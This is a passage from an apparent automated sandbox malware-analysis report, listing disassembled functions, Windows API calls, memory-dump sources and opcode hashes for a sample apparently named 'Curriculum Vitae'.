                      • Opcode ID: 64776c0a828a90f47da70132b3769d81a502b2fb3245cc537926101c96d00164
                      • Instruction ID: dff491b3c5334f7d5c45fde9ec5b3a512beb1b12677def9d5b7faa7a07f8e8e0
                      • Opcode Fuzzy Hash: 64776c0a828a90f47da70132b3769d81a502b2fb3245cc537926101c96d00164
                      • Instruction Fuzzy Hash: F4E02631400A10DFCA06AB19BC5DE8833D1FB49322F1091ACFB02A71D19B3228C5867F
                      Function 00D8D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LocalTime
                      • String ID: %.3d$X64
                      • API String ID: 481472006-1077770165
                      • Opcode ID: e59c114feaa63b4ecaaa04e8be6325412ae1a5f8c0229822eb24aa912762b151
                      • Instruction ID: c7514394507cde56f3a213856e0d9c0096c7ea4d6e9ac65a0cef08925e047c23
                      • Opcode Fuzzy Hash: e59c114feaa63b4ecaaa04e8be6325412ae1a5f8c0229822eb24aa912762b151
                      • Instruction Fuzzy Hash: 36D012A1808109FACB50A7D0DC49EB9B3BEEB09301F508452F956D20C0D634C5086775
                      Function 00DC2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                      Download Yara Rule
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DC236C
                      • PostMessageW.USER32(00000000), ref: 00DC2373
                        • Part of subcall function 00D9E97B: Sleep.KERNEL32 ref: 00D9E9F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      • Opcode ID: 632a124013cb152336ed5990bf82caac338efb5659c373a885f97452eb279ef5
                      • Instruction ID: 671b01ebcb11f4704cb0cef16e4e0dd9091ebc03b6cd0f29dc7dd9ed67b5759a
                      • Opcode Fuzzy Hash: 632a124013cb152336ed5990bf82caac338efb5659c373a885f97452eb279ef5
                      • Instruction Fuzzy Hash: 95D0C9327E13127AE664B7719C0FFC666149B04B14F115916B74AEA2E0C9A4A8458A74
                      Function 00DC2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                      Download Yara Rule
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DC232C
                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DC233F
                        • Part of subcall function 00D9E97B: Sleep.KERNEL32 ref: 00D9E9F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      • Opcode ID: 6ed8bfc1ef47cdccd27c39b72a21ccfe28f4aa26b60e7a9f6aeb14b3a732aca2
                      • Instruction ID: abbaf728a4fea1efe8ca3f7c1fb06df032873f96260d110e9721b2bb287a9591
                      • Opcode Fuzzy Hash: 6ed8bfc1ef47cdccd27c39b72a21ccfe28f4aa26b60e7a9f6aeb14b3a732aca2
                      • Instruction Fuzzy Hash: 6ED0A9327A0312BAE664B3309C0FFC66A049B00B00F004906B30AEA2E0C8A0A8018A30